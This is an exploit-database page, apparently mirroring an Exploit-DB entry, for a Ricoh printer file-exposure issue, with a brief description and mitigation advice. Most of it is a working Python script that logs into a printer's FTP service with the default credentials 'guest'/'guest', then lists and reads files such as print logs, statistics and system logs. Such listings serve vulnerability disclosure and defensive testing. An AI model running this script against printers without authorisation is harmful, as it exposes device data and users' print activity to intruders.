header-logo
Suggest Exploit
vendor:
Ricoh Printers
by:
Thomas Heverin
6.1
CVSS
HIGH
Directory and File Exposure
200
CWE
Product Name: Ricoh Printers
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE: h:ricoh:printers
Metasploit:
Other Scripts:
Platforms Tested: Windows
2023

Ricoh Printer Directory and File Exposure

The exploit allows an attacker to connect to a Ricoh printer over FTP using default credentials and access directories such as Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics), and Syslog (System Log). The attacker can list files and directories, read files, and potentially extract sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to change the default credentials on Ricoh printers and restrict access to FTP services. Regularly monitoring FTP connections and reviewing access logs can also help detect unauthorized access.
Source

Exploit-DB raw data:

#Exploit Title: Ricoh Printer Directory and File Exposure 
#Date: 9/15/2023
#Exploit Author: Thomas Heverin (Heverin Hacker)
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
#Version: Ricoh Printers - All Versions
#Tested on: Windows
#CVE: N/A 

#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)

from ftplib import FTP

def ftp_connect(ip):
    try:
        ftp = FTP(ip)
        ftp.login("guest", "guest")
        print(f"Connected to {ip} over FTP as 'guest'")
        return ftp
    except Exception as e:
        print(f"Failed to connect to {ip} over FTP: {e}")
        return None

if __name__ == "__main__":
    target_ip = input("Enter the Ricoh Printer IP address: ")
    
    ftp_connection = ftp_connect(target_ip)
    if ftp_connection:
        try:
            while True:
                file_list = ftp_connection.nlst()
                print("List of Ricoh printer files and directories:")
                for index, item in enumerate(file_list, start=1):
                    print(f"{index}. {item}")
                
                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
                if file_index < 0:
                    break
                
                if 0 <= file_index < len(file_list):
                    selected_file = file_list[file_index]
                    lines = []
                    ftp_connection.retrlines("RETR " + selected_file, lines.append)
                    print(f"Contents of '{selected_file}':")
                    for line in lines:
                        print(line)
                else:
                    print("Invalid file index.")
        except Exception as e:
            print(f"Failed to perform operation: {e}")
        finally:
            ftp_connection.quit()

Navigation

Suggest Exploit

Services By CQR